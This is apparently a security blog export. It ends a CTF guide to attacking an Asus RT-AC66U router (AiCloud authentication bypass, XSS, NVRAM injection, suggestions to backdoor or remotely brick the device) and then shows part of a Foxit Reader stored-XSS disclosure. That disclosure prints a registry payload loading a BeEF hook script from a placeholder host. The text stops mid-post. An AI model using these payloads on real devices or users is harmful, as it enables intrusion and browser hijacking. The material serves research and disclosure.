<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqMENPHzDzoj8ymyws38d-Qj46UCbqun8o-3yzbMH_9fuZlxoyR6aMDB0sFYufwcKSs_APZxVpKfoqPeAilF7m8VXVwVfQfJxSu325ls502c_KVT0LQvGWxR0pKsYBsRY0HyPSOVMXnYoA/s1600/dns1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqMENPHzDzoj8ymyws38d-Qj46UCbqun8o-3yzbMH_9fuZlxoyR6aMDB0sFYufwcKSs_APZxVpKfoqPeAilF7m8VXVwVfQfJxSu325ls502c_KVT0LQvGWxR0pKsYBsRY0HyPSOVMXnYoA/s1600/dns1.png" height="262" width="400" /></a></div>
<br />
If you're too lazy to run these commands, you can simply search for <i>asuscomm.com</i> on <a href="http://www.shodanhq.com/">Shodan</a>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipv4GuZTGIEBf_r0OtWT1iNGZLfMMnY9XCMjTGRSwsVLk6QMblhSrSLmUgVVzRwuDUdfyKdsYEiYGpbkkvxroJFj2NjPkIDsV2qAP4tRxTs9jyyZ-zFd5t3IIhBmC7hmc8SpqOIyUh4iCB/s1600/shodan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipv4GuZTGIEBf_r0OtWT1iNGZLfMMnY9XCMjTGRSwsVLk6QMblhSrSLmUgVVzRwuDUdfyKdsYEiYGpbkkvxroJFj2NjPkIDsV2qAP4tRxTs9jyyZ-zFd5t3IIhBmC7hmc8SpqOIyUh4iCB/s1600/shodan.png" height="256" width="400" /></a></div>
<br />
AiCloud runs on ports 8082 and 443 by default. The fact that anyone can easily map the routers running this service could be very worrisome, <a href="http://www.securityfocus.com/archive/1/526942">right</a>?<br />
<br />
Another interesting crypto exercise is to reverse the algorithm used to generate the WPS device PIN. You can view the currently PIN and secret_code by issuing the following command: <i>nvram show | grep -E "secret_code|wps_device_pin"</i>. Search for these variables in the source code and use this information to create you own WPS Keygen (don't forget to include a chiptune from <a href="http://pouet.net/">pouet.net</a>).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5UzQQXpiP4Ligd0deYF_gCNDya5eoB1TzImdUO8W9Anz08-7egjexJW4aA6ce_rfIgUn2ec2hyGyyfzO2c8IuYsT1BaWYJB45JPTqwh06YNF8_aqEhiw7hTi8aUraPc3AUxtWguo7LCQj/s1600/search.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5UzQQXpiP4Ligd0deYF_gCNDya5eoB1TzImdUO8W9Anz08-7egjexJW4aA6ce_rfIgUn2ec2hyGyyfzO2c8IuYsT1BaWYJB45JPTqwh06YNF8_aqEhiw7hTi8aUraPc3AUxtWguo7LCQj/s1600/search.PNG" height="153" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNGjqKkVi86B7Ghx73clOADJzoBvieW9KmJCgAiRs7RJX6XdyltANMRCarWrLtXvRcRZuZ66UYk_EHxxCIgDWHR4UP7HidX9uaPEg5djGq9ZVy_7Wy6gH9DIPJYlBWbj9R5FtqVxGVky3A/s1600/generate.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNGjqKkVi86B7Ghx73clOADJzoBvieW9KmJCgAiRs7RJX6XdyltANMRCarWrLtXvRcRZuZ66UYk_EHxxCIgDWHR4UP7HidX9uaPEg5djGq9ZVy_7Wy6gH9DIPJYlBWbj9R5FtqVxGVky3A/s1600/generate.PNG" height="276" width="640" /></a></div>
<br />
You can also test the entropy from the crypto keys generated by the device. Check the slides from the "<a href="http://events.ccc.de/congress/2013/Fahrplan/system/attachments/2226/original/Scanning-30c3-13.pdf">Fast Internet-wide Scanning and its Security Applications</a>" to gather some ideas:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCy8YKFDcxzdKooSGxyd7QqKOK9_rmsuy8Ynr3ZtgDDB5zlix9ly5ZvO-iKNnE0xM-KxnOsYyR0ItKXQFpdH-veKmvpSWllIjG5O4iJHboMX5lSLYguZ79XFpGi6Y1HtZ5XmdAaCvjO30t/s1600/crypto.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCy8YKFDcxzdKooSGxyd7QqKOK9_rmsuy8Ynr3ZtgDDB5zlix9ly5ZvO-iKNnE0xM-KxnOsYyR0ItKXQFpdH-veKmvpSWllIjG5O4iJHboMX5lSLYguZ79XFpGi6Y1HtZ5XmdAaCvjO30t/s1600/crypto.PNG" height="271" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Slides from <a href="https://www.youtube.com/watch?v=K47MZIEXQEI">Fast Internet-wide Scanning and its Security Applications [30c3]</a></td></tr>
</tbody></table>
<b>web</b><br />
<br />
There are so many things to test on the Web application that I'll focus on a few different approaches. The router's administrative interface has no CSRF protection. It has the traditional ping command injection and lots of XSS vectors.<br />
<br />
The HTTP daemon is based on microhttpd. It has some basic Directory Traversal Protection on httpd.c:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdOr3eMGSwtfzCVs2_nDt9ggEtdEZVEqTUGfa6obueUsz6ADH2W_pkbbrlb7FS0PW0noU6LT9C4Ig-6YbBOMxFPtO4k4vHKbNELseQVXrIiZJOAchQLYclZ2Q5DTOhE6pPwQNpNai5V2hB/s1600/trav1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdOr3eMGSwtfzCVs2_nDt9ggEtdEZVEqTUGfa6obueUsz6ADH2W_pkbbrlb7FS0PW0noU6LT9C4Ig-6YbBOMxFPtO4k4vHKbNELseQVXrIiZJOAchQLYclZ2Q5DTOhE6pPwQNpNai5V2hB/s1600/trav1.PNG" height="139" width="640" /></a></div>
<br />
We can shamelessly steal <a href="https://twitter.com/hackerfantastic">hackerfantastic</a>'s <a href="http://www.exploit-db.com/download_pdf/18094/">idea</a> and test for potential bypasses (there's an extensive <a href="https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/JHADDIX_LFI.txt">list of LFI tests</a> at <a href="https://github.com/danielmiessler/SecLists">Seclists</a>):<br />
<br />
<script src="https://gist.github.com/bmaia/bb787f8092a3a54303c0.js"></script><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfR_7MFcYS12brKyioxfeTJHYtpd-e5YkIRl7CtmLmpAWFLm2sAXHNBxK3WWazuBncotBaB01s8K04ZSxRazKkECr_qATNiUi0RleX9GGx6VwTEOsNkkYHwGm9a2QXuWVfU5T1VMDarr75/s1600/traversal.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfR_7MFcYS12brKyioxfeTJHYtpd-e5YkIRl7CtmLmpAWFLm2sAXHNBxK3WWazuBncotBaB01s8K04ZSxRazKkECr_qATNiUi0RleX9GGx6VwTEOsNkkYHwGm9a2QXuWVfU5T1VMDarr75/s1600/traversal.png" height="261" width="400" /></a></div>
<br />
The web server has some mime handler exceptions that were "supposed to be removed":<br />
<br />
<script src="https://gist.github.com/bmaia/08e9d6f8dffa84d8bf81.js"></script>
get_webdavInfo.asp is accessible without authentication and displays lots of sensitive information from the device and the network:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirFirRag55xYCyzTqaEhrfb-GkikBJkIOP0fHoAK2RKbm-lx8DEPDmpx-OznCS39u18oTN6f-2Ghr49k19yUdsWXbuy4nh6vHCnsZphtjlWFMu_Xr2jCbd8fuyORSEFwL8ivJQ4YSTky7A/s1600/printe.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirFirRag55xYCyzTqaEhrfb-GkikBJkIOP0fHoAK2RKbm-lx8DEPDmpx-OznCS39u18oTN6f-2Ghr49k19yUdsWXbuy4nh6vHCnsZphtjlWFMu_Xr2jCbd8fuyORSEFwL8ivJQ4YSTky7A/s1600/printe.PNG" height="116" width="400" /></a></div>
<br />
We can modify the nvram variables used to display this page and backdoor the router with a XSS payload, for example.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnA_WvBSZj1ItQeUQ0kcQkJNipK4EyeoMfaT9lUl7FOzyd6dxw9W9vpO1A0XHbXi5k45thEbYLJ3TI7bV7ul-H__wnWz2_WcH7tHEVXVdXJpE7cO9GSgDy2Dfp5U3VWjkTOc21AFJupNHK/s1600/xss.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnA_WvBSZj1ItQeUQ0kcQkJNipK4EyeoMfaT9lUl7FOzyd6dxw9W9vpO1A0XHbXi5k45thEbYLJ3TI7bV7ul-H__wnWz2_WcH7tHEVXVdXJpE7cO9GSgDy2Dfp5U3VWjkTOc21AFJupNHK/s1600/xss.PNG" height="231" width="400" /></a></div>
<br />
Some sensitive operations use the <i>nvram_get</i> and <i>nvram_safe_get</i> function. Some settings are stored using the <i>nvram_set</i> function. If the router does not sanitize the data being stored and retrieved from the NVRAM you may perform some kind of NVRAM Injection (remember, 00, %0A, %0D and `reboot` are always there for you).<br />
<br />
AiCloud is a *very* vulnerable service that can be <a href="http://www.securityfocus.com/archive/1/526942">easily exploited</a> too. When you activate the service, the router starts a lighttpd daemon on port 8082 (or 443 on newer firmwares) and offers the option to share your files online. The only caveat is that the username and password screen can be bypassed by visiting the /smb/ URL (read the source, Luke):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwDwFnAjWddSNUNzEBj_u0bQIVUKUK2z32BCl4Aybn_J0UePln7DoMQd-yuRb3PwhlU7ea7YEOFV6sLvP-IRdrZyeeoMDE8e8-ohNILfConHhVXCZCfJY81jwZWOGoB7Wj1BNJlYsg1tFf/s1600/ai1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwDwFnAjWddSNUNzEBj_u0bQIVUKUK2z32BCl4Aybn_J0UePln7DoMQd-yuRb3PwhlU7ea7YEOFV6sLvP-IRdrZyeeoMDE8e8-ohNILfConHhVXCZCfJY81jwZWOGoB7Wj1BNJlYsg1tFf/s1600/ai1.PNG" height="300" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg3Q3m0RlTPoB5EOO9cLUfxjpoFA8D5-6SnUzy7wjXLgJsoRQs4QsXBrKe7L-KDbK3LU8xM5LjJ8h8v72DeLYdCKkNwMAV2S82wDrmoZbOHD2gJooKKejA3ATihGj0obM3C8eNCGwTacEg/s1600/ai2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg3Q3m0RlTPoB5EOO9cLUfxjpoFA8D5-6SnUzy7wjXLgJsoRQs4QsXBrKe7L-KDbK3LU8xM5LjJ8h8v72DeLYdCKkNwMAV2S82wDrmoZbOHD2gJooKKejA3ATihGj0obM3C8eNCGwTacEg/s1600/ai2.PNG" height="295" width="400" /></a></div>
<br />
I wrote a simple AiCloud crawler that exploits this bug on RT-AC66U v3.0.0.4.266. It lists all the files/paths from the router (including the attached USB devices).<br />
<br />
<script src="https://gist.github.com/bmaia/9a811b1e9f58e31814d5.js"></script><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht0r6xgp699drClb6EX5ZMosBjYLNgvfe4u108STdNsQ3kx2iYPHLhRs3Zm3nNYDjEvex8ooQ0alJlLYn3jqalfWEOGBGHKCpF1vQRaDZ8MTyx8uaW_qI6sDmKG6mxi6AHHQLn36kdeeRs/s1600/x1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht0r6xgp699drClb6EX5ZMosBjYLNgvfe4u108STdNsQ3kx2iYPHLhRs3Zm3nNYDjEvex8ooQ0alJlLYn3jqalfWEOGBGHKCpF1vQRaDZ8MTyx8uaW_qI6sDmKG6mxi6AHHQLn36kdeeRs/s1600/x1.png" height="262" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD91rF6f73IH1fBtqUOuGrJUhHK1EST4xdeoU6Pm9WK2voxALJRIM1SRNpA9T2Poe3PZq6SbumDXuDseJbnN-7IOlg5wVzy7u7N429Jy75e1fXSUH6EX6tX9GGkLf0ANoWuoTry3y_jqwc/s1600/x2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD91rF6f73IH1fBtqUOuGrJUhHK1EST4xdeoU6Pm9WK2voxALJRIM1SRNpA9T2Poe3PZq6SbumDXuDseJbnN-7IOlg5wVzy7u7N429Jy75e1fXSUH6EX6tX9GGkLf0ANoWuoTry3y_jqwc/s1600/x2.png" height="97" width="400" /></a></div>
<br />
Last, but not least, don't forget to compare the differences between the files in the <i>www</i> directory. This path stores all the web components and scripts used by the web application.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW5i1Aj-SLOJuOY3Aj88vTCJjx_XNDsg_U1zNEULDLIEqzE8pyXiiG_x50I1KAyiFgL6Jb-RvfZw2iOQEajuRbK1RiW1xeOLPz8efFRkCaf16-1UM_6cc8ub9dXZ4VGjaUxAnv1V2wINhW/s1600/www.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW5i1Aj-SLOJuOY3Aj88vTCJjx_XNDsg_U1zNEULDLIEqzE8pyXiiG_x50I1KAyiFgL6Jb-RvfZw2iOQEajuRbK1RiW1xeOLPz8efFRkCaf16-1UM_6cc8ub9dXZ4VGjaUxAnv1V2wINhW/s1600/www.png" height="227" width="400" /></a></div>
<b><br /></b>
<b>bonus</b><br />
<b><br /></b>
Why not trying to open the hardware case without voiding the warranty seal? You may need some tips from the guys at the <a href="http://defcne.net/villages/22/17">DEFCON Tamber Evident Village</a>.<br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7Wn_1QRVd-1bm3hzzvtZqZgdn3Mc_b2VdN8Hf8S1_UcjWQeiCjcmIJ2eCpWXG7x738qoONV6GAbMVGPRMzyoTP5gsqlHLArMSdpwK8_nGyKie-Edg2KzTVFkN1h6rRNM4QLLRobxnBuN7/s1600/tamper.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7Wn_1QRVd-1bm3hzzvtZqZgdn3Mc_b2VdN8Hf8S1_UcjWQeiCjcmIJ2eCpWXG7x738qoONV6GAbMVGPRMzyoTP5gsqlHLArMSdpwK8_nGyKie-Edg2KzTVFkN1h6rRNM4QLLRobxnBuN7/s1600/tamper.png" height="400" width="348" /></a></div>
<br />
<br />
<b>misc (a.k.a. Conclusion)</b><br />
<br />
Hacking the Asus RT-AC66U is a very good exercise for the newcomers on router hacking. Most of its source code is available online and we can easily find lots of exploits and advisories for it. You may not have noticed but we tested every single aspect of the <a href="https://www.owasp.org/index.php/OWASP_Internet_of_Things_Top_Ten_Project#tab=OWASP_Internet_of_Things_Top_10_for_2014">OWASP Internet of Things Top 10</a>. Recent rumors indicate that this router is going to be used as the base for the OWASP IoT Webgoat and the Damn Vulnerable Embedded Linux.<br />
<br />
Some additional approaches you should be taking and that should be awarded extra points during the contest:<br />
<br />
<ul>
<li>Rewrite the bootloader to create a backdoored dual-boot partition</li>
<li>Backdoor the device in a way that firmware upgrades won't affect it</li>
<li>Brick the device remotely</li>
<li>Reprogram the LED to create a PONG game</li>
</ul>
<br />
There are many things that I still want to write about, but I'm saving that for future posts. If you are going to participate in the <a href="http://sohopelesslybroken.com/">SOHOpelesslyBroken CTF</a> and find this guide useful, feel free to ping me and let's get a coffee together during DEFCON/BsidesLV/Blackhat =)<br />
<br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com7tag:blogger.com,1999:blog-3296471108082693838.post-28710662829523206862014-07-07T10:52:00.000-03:002014-07-16T23:41:20.765-03:00Foxit PDF Reader Stored XSSA friend of mine was performing an external pentest recently and he started to complain that his traditional Java exploits were not being effective. He was able to map a few applications and defenses in place protecting the client's network but he still needed an initial access to start pivoting.<br />
<br />
Basic protections like AV, application white-listing as well as more advanced ones like EMET are used to make the life of criminals (and pentesters) harder, but they're often bypassed. While discussing alternatives with my friend, he told me that the company replaced Adobe Reader after seeing lots of Security Advisories for the product. And what was the replacement? Foxit Reader:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5WwaxcMQmAz7LXN6ZnpjhPynApNziXCmWpm3GGgZKRVKso3sNTbfuDdmFibKc2rTvqzNXesKtZgInW58LJoMgVTSysAH2d1fvkstDnGl_6UVN3Dw_RK2wGnP1ZNpJLymw7i-tP3iPviK2/s1600/chart.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5WwaxcMQmAz7LXN6ZnpjhPynApNziXCmWpm3GGgZKRVKso3sNTbfuDdmFibKc2rTvqzNXesKtZgInW58LJoMgVTSysAH2d1fvkstDnGl_6UVN3Dw_RK2wGnP1ZNpJLymw7i-tP3iPviK2/s1600/chart.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Advisories for Adobe Reader and Foxit Reader listed on <a href="http://www.osvdb.com/">OSVDB</a> (May/2014)</td></tr>
</tbody></table>
Less advisories means that the product is more secure, right? <a href="https://twitter.com/mruef">Marc Ruef</a>'s talk about <a href="http://www.scip.ch/publikationen/praesentationen/scip_area41-2014_vuldb.pdf">VDB management</a> summarizes this point:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrXECd3LsOS4yECWPXLioH13ecmdq7ghM5dy3o3QlxRfG3rjHMDKTToZFfV_PILx8zIuJI_64w6MtB3VSnN-30RT-pX4rkhMmgPUO2F_1I23zt9mQ9cJNN1rZEuKZ8_51tMfq66nw9K4GU/s1600/talk.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrXECd3LsOS4yECWPXLioH13ecmdq7ghM5dy3o3QlxRfG3rjHMDKTToZFfV_PILx8zIuJI_64w6MtB3VSnN-30RT-pX4rkhMmgPUO2F_1I23zt9mQ9cJNN1rZEuKZ8_51tMfq66nw9K4GU/s1600/talk.PNG" height="368" width="640" /></a></div>
<br />
The moment I head the word Foxit Reader I remembered of an old exploit I created a long time ago. The vulnerability wasn't that critical but I knew that it would fit for the situation (and for this blog post).<br />
<div style="text-align: left;">
<br /></div>
As I was about to disclose it publicly I notified the vendor and waited for them to patch it. I had some problems with their security contact and had to mail them twice, but they answered after a couple of days, patching the product and releasing an advisory (no CVE is assigned for this vulnerability as the time of writing).<br />
<br />
<b>Security Advisory</b><br />
<b><br /></b>
<a href="http://www.foxitsoftware.com/support/security_bulletins.php#FRD-21">http://www.foxitsoftware.com/support/security_bulletins.php#FRD-21</a><br />
<br />
<b>Fixed a security issue caused by the Stored XSS vulnerability when reading and displaying filenames and their paths on the “Recent Documents” section from the Start Page.</b><br />
<br />
<b>Summary</b><br />
<b><br /></b>
Foxit Reader 6.2.1, Foxit Enterprise Reader 6.2.1, and Foxit PhantomPDF 6.2.1 fixed a security issue caused by the Stored XSS vulnerability when reading and displaying filenames and their paths on the “Recent Documents” section from the Start Page. Attackers could tamper with the registry entry and cause the application to load malicious files.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw3WgRDpfVg4jJ-iWnxecsozykNNttgxR8Poy5FFJtTS1st8pjD4c_RrzdufCnvhvwrj78g5B2TH6K8m-2yF2LUhOyVjVGwlve-7GzoyotYw-X0X8lj40JEYgOyZi1mkQFzCfig7evDs0p/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw3WgRDpfVg4jJ-iWnxecsozykNNttgxR8Poy5FFJtTS1st8pjD4c_RrzdufCnvhvwrj78g5B2TH6K8m-2yF2LUhOyVjVGwlve-7GzoyotYw-X0X8lj40JEYgOyZi1mkQFzCfig7evDs0p/s1600/1.PNG" height="307" width="400" /></a></div>
<br />
When opening a PDF, Foxit creates a "FileX" registry entry with the document's complete path:<br />
<div>
<div>
<br /></div>
<div>
[HKEY_CURRENT_USER\Software\Foxit Software\Foxit Reader 6.0\Recent File List]</div>
<div>
"File1"="C:\\w00t.pdf"</div>
<div>
<br /></div>
<div>
Whenever you open a document, Foxit 6.x displays the start panel on a different tab by default. All you need to do is edit the registry and place your XSS payload (or the <a href="http://beefproject.com/">BeEF</a> hook) on the FileX entry:</div>
<br />
<div class="code">
C:\Users\Admin\Desktop>type reg.reg<br />
<br />
Windows Registry Editor Version 5.00<br />
<br />
[HKEY_CURRENT_USER\Software\Foxit Software\Foxit Reader 6.0\Recent File List]<br />
"File1"="C:\\w00t.pdf<script src=\"http://BEEF/hook.js\"></script>"<br />
<br />
C:\Users\Admin\Desktop>reg import reg.reg<br />
The operation completed successfully.</div>
<div>
<br /></div>
<div>
Now wait for the victim to open any PDF File (using Foxit Reader):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3CF_PxmB3_SrAGmoLMFi-MrIdXJMxwIrj60hE-NSHh2dpJE-i1YysHi3SVbkDqhnh1oi-N7z2M-Oox5qEY33m0fbK9LFtPzMD0MLhzIqQaPUEs6fRnzRmoaZgIjecZTs5VIugIUB9iNZ1/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3CF_PxmB3_SrAGmoLMFi-MrIdXJMxwIrj60hE-NSHh2dpJE-i1YysHi3SVbkDqhnh1oi-N7z2M-Oox5qEY33m0fbK9LFtPzMD0MLhzIqQaPUEs6fRnzRmoaZgIjecZTs5VIugIUB9iNZ1/s1600/2.PNG" height="227" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirgX4d3Cf-wip0HQc9MWQtfyn_9MbCL7qp4TuHgzmHmCax__4iOdz0BZ3ihWiMPOvIVM60Yfv2Q_NExStLXrVXva1yyPGkdqWLkFgFV2kIptXupjUH9nV7a4LISm7jLRgiqElQKvGezOU_/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirgX4d3Cf-wip0HQc9MWQtfyn_9MbCL7qp4TuHgzmHmCax__4iOdz0BZ3ihWiMPOvIVM60Yfv2Q_NExStLXrVXva1yyPGkdqWLkFgFV2kIptXupjUH9nV7a4LISm7jLRgiqElQKvGezOU_/s1600/3.PNG" height="306" width="400" /></a></div>
<b><br /></b>
<b>Affected Versions</b></div>
</div>
<br />
Foxit Reader 6.2.0.0429 and earlier<br />
Foxit Enterprise Reader 6.2.0.0429 and earlier<br />
Foxit PhantomPDF 6.2.0.0429 and earlier<br />
<br />
<b>Solution</b><br />
<br />
Upgrade to Foxit Reader 6.2.1, Foxit Enterprise Reader 6.2.1, or Foxit PhantomPDF 6.2.1.<br />
<br />
<b>Security Process</b><br />
<br />
2014-05-24: <a href="https://twitter.com/bernardomr">Bernardo Rodrigues</a> found the issue;<br />
2014-06-03: Core Security Technologies confirmed the issue;<br />
2014-06-11: Foxit fixed the issue;<br />
2014-07-01: Foxit released fixed version of Foxit Reader 6.2.1/Foxit Enterprise Reader 6.2.1/Foxit PhantomPDF 6.2.1.<br />
<div>
<br />
<b>Foxit Reader XSS + Phishing</b><br />
<b><br /></b>
I know, the bug does not seem to be that good and would have no use during a pentest engagement. When I first found this flaw, I could basically think of three ways to compromise the user's Foxit Reader installation:<br />
<br />
<b>1 - Sending a PDF with the XSS payload on the filename</b><br />
<br />
That would be the ideal solution but I was unable to craft a file with the XSS payload and open it on a Windows System. Microsoft Windows won't create filenames with special chars like <, > and / so I booted my Linux VM, created a file called <plaintext>.pdf and compressed it into test.zip.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1Q96p2iI2bdulz7Tx7uh7gvs2ik4VQ525U6LzygGOO6V7xSU9By3dMsieXaUII5nYf3FEd5EI8qJQCccI6wzGx4z2t8VvRIl-FWhhjpQsPRY3DQ6m4Kkp29bPABAlxRNw9cK4ZWTJUYrX/s1600/x2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1Q96p2iI2bdulz7Tx7uh7gvs2ik4VQ525U6LzygGOO6V7xSU9By3dMsieXaUII5nYf3FEd5EI8qJQCccI6wzGx4z2t8VvRIl-FWhhjpQsPRY3DQ6m4Kkp29bPABAlxRNw9cK4ZWTJUYrX/s1600/x2.PNG" height="228" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3ikUrTn04VNRW63DKyTIuz3jGjzLIs_zpbTG-jxsZnlgwPUp2ju8vjXzbq0y6ZiciuK_b6S7I1-lkITAfcRZUUG771GPoiI98yLJDLH8rV15FEB6FFph19oLq5ug7ND19qc0E0tYAan0R/s1600/x1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3ikUrTn04VNRW63DKyTIuz3jGjzLIs_zpbTG-jxsZnlgwPUp2ju8vjXzbq0y6ZiciuK_b6S7I1-lkITAfcRZUUG771GPoiI98yLJDLH8rV15FEB6FFph19oLq5ug7ND19qc0E0tYAan0R/s1600/x1.PNG" height="245" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7Ky4ojm1cZorATOsbRUd6_2nO0VaZ6KdVnYVwITmBFwsAX03m32Ow8sGjmaoa4lwAjVFIkFgCTAMqXACcyV4WHVq73_JBplOZREBnoO8aQLEBIxobdNC4-mGQU35rism_1R7AwcxSpp6S/s1600/x3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7Ky4ojm1cZorATOsbRUd6_2nO0VaZ6KdVnYVwITmBFwsAX03m32Ow8sGjmaoa4lwAjVFIkFgCTAMqXACcyV4WHVq73_JBplOZREBnoO8aQLEBIxobdNC4-mGQU35rism_1R7AwcxSpp6S/s1600/x3.PNG" height="182" width="400" /></a></div>
<br />
When double clicking the file on WinRAR, the OS won't open it. If we drag it to the Foxit Reader Window, the special chars are replaced and the XSS payload won't load.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
